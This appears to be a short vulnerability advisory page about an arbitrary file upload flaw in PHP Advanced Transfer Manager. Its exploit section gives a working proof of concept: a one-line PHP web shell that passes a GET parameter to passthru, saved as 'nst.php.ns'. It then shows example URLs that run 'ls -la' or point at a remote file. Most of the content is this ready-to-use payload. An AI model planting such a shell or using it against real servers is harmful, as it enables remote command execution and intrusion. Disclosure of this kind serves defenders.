PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability

info
discussion
exploit
solution
references

PHP Advanced Transfer Manager Arbitrary File Upload Vulnerability

No exploit is required.

The following proof of concepts are available:
Create file:
nst.php.ns

<pre>
<?
passthru($_GET['nst']);
?>

Then upload, and go to http://www.example.com/files/nst.php.ns?nst=ls -la

or

<?
passthru($_GET['nst']);
?>

Then upload, and go to http://example.com/files/nst.php.ns?nst=http://your/file.txt